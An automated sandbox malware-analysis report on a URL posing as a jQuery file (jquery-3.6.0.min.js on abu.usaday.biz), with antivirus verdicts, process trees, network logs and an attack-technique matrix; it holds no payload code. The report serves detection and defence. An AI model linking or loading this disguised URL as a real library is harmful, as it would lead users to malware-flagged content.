Edit tour

Windows Analysis Report
http://abu.usaday.biz/jquery-3.6.0.min.js

Overview

General Information

Sample URL:http://abu.usaday.biz/jquery-3.6.0.min.js
Analysis ID:1322536
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Stores files to the Windows start menu directory
Creates files inside the system directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 6504 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2040,i,1388585368886845847,6482679812835657815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4312 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abu.usaday.biz/jquery-3.6.0.min.js MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://abu.usaday.biz/jquery-3.6.0.min.jsAvira URL Cloud: detection malicious, Label: malware
Source: abu.usaday.bizVirustotal: Detection: 7%Perma Link
Source: http://abu.usaday.biz/jquery-3.6.0.min.jsVirustotal: Detection: 6%Perma Link
Source: https://abu.usaday.biz/favicon.icoAvira URL Cloud: Label: malware
Source: https://abu.usaday.biz/jquery-3.6.0.min.jsHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 104.98.116.138:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknownDNS traffic detected: queries for: clients2.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.155
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.43
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.43
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.155
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.134Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: abu.usaday.bizConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: abu.usaday.bizConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://abu.usaday.biz/jquery-3.6.0.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Oct 2023 03:16:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813bb413ec3c7c83-LAXalt-svc: h3=":443"; ma=86400
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2023-10-05-14; NID=511=OL3WgnA24QwPfMpspsItpZ2c_g7YXAAMilzUqiZdxG8z8Ka1c00AfG24ctRwvhPMrHVqO7oNbKVSwiOA0g2EzuMjPJIvQtOS7zZy99O8OkMoKSMKDFs-L1TjxHc_KVN5KBVb4BTfsPAzvlWsn_iACmkP3ulD50w_qpZ6JVqkr7w
Source: unknownHTTPS traffic detected: 104.98.116.138:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_6504_903654782Jump to behavior
Source: classification engineClassification label: mal72.win@17/8@12/7
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2040,i,1388585368886845847,6482679812835657815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abu.usaday.biz/jquery-3.6.0.min.js
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2040,i,1388585368886845847,6482679812835657815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration5
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1322536 URL: http://abu.usaday.biz/jquer... Startdate: 10/10/2023 Architecture: WINDOWS Score: 72 24 Multi AV Scanner detection for domain / URL 2->24 26 Antivirus detection for URL or domain 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for submitted file 2->30 6 chrome.exe 9 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.3, 138, 443, 49707 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 accounts.google.com 142.250.217.141, 443, 49714 GOOGLEUS United States 11->18 20 clients.l.google.com 142.250.72.174, 443, 49713 GOOGLEUS United States 11->20 22 4 other IPs or domains 11->22

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://abu.usaday.biz/jquery-3.6.0.min.js100%Avira URL Cloudmalware
http://abu.usaday.biz/jquery-3.6.0.min.js7%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
abu.usaday.biz8%VirustotalBrowse
SourceDetectionScannerLabelLink
https://abu.usaday.biz/favicon.ico100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    accounts.google.com
    142.250.217.141
    truefalse
      high
      abu.usaday.biz
      172.67.148.211
      truefalseunknown
      www.google.com
      172.217.12.132
      truefalse
        high
        clients.l.google.com
        142.250.72.174
        truefalse
          high
          fp2e7a.wpc.phicdn.net
          192.229.211.108
          truefalseunknown
          clients2.google.com
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://a.nel.cloudflare.com/report/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3Dfalse
              high
              https://abu.usaday.biz/favicon.icofalse
              • Avira URL Cloud: malware
              unknown
              https://abu.usaday.biz/jquery-3.6.0.min.jsfalse
                unknown
                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                  high
                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                    high
                    https://abu.usaday.biz/jquery-3.6.0.min.jsfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      142.250.217.141
                      accounts.google.comUnited States
                      15169GOOGLEUSfalse
                      172.217.12.132
                      www.google.comUnited States
                      15169GOOGLEUSfalse
                      239.255.255.250
                      unknownReserved
                      unknownunknownfalse
                      172.67.148.211
                      abu.usaday.bizUnited States
                      13335CLOUDFLARENETUSfalse
                      35.190.80.1
                      a.nel.cloudflare.comUnited States
                      15169GOOGLEUSfalse
                      142.250.72.174
                      clients.l.google.comUnited States
                      15169GOOGLEUSfalse
                      IP
                      192.168.2.3
                      Joe Sandbox Version:38.0.0 Ammolite
                      Analysis ID:1322536
                      Start date and time:2023-10-10 05:15:23 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 2m 58s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://abu.usaday.biz/jquery-3.6.0.min.js
                      Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal72.win@17/8@12/7
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 209.197.3.8, 192.229.211.108, 142.250.68.67, 34.104.35.123
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2675
                      Entropy (8bit):3.9792222409972267
                      Encrypted:false
                      SSDEEP:48:8EdvTTvVnHGidAKZdA1kLehwiZUklqehXy+3:8M/VtIy
                      MD5:D292DFFA546FCF61DAA4371EF003C21E
                      SHA1:F33323CE23B16043A0DB886E180378ACD24DA736
                      SHA-256:875B492F9685D392E06A2EF72552880FEEE9FF62671545FE9C0D12AEE278E1C8
                      SHA-512:32A4529595C237695486958076E551A8E00CA9FA53C738C1D9A874AECB3C60C8D161BC4BD85865A6989B906F89C744C00E759284F435CA62E4400912BE9B480F
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,....[...(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 10 02:16:11 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2677
                      Entropy (8bit):3.993035146443153
                      Encrypted:false
                      SSDEEP:48:8NdvTTvVnHGidAKZdA1DLeh/iZUkAQkqeh4y+2:8v/Vx9QVy
                      MD5:E94583FE1ECD8F98ECFF507EB9000563
                      SHA1:E8057004CBA164BDDFD3EDC5C07EB6D8D6407DEB
                      SHA-256:3F832301D8856DB2C19AF1CCD6AA425501D9145A1790C56E91EDA5FC7A70E720
                      SHA-512:3ED746A15BC3002B8B5CD67EBB36A8A6D30CD851ADA8D43EC885B44CDF1D2921A5CF917ABE3162A8623E1D7743CC5D0C84E9756DE1F7CF0C034BDE4DD5A31939
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,........(.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.IJW......B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VJW......L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.VJW......M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.VJW.............................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VJW......O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 13:13:28 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2691
                      Entropy (8bit):4.004804305461457
                      Encrypted:false
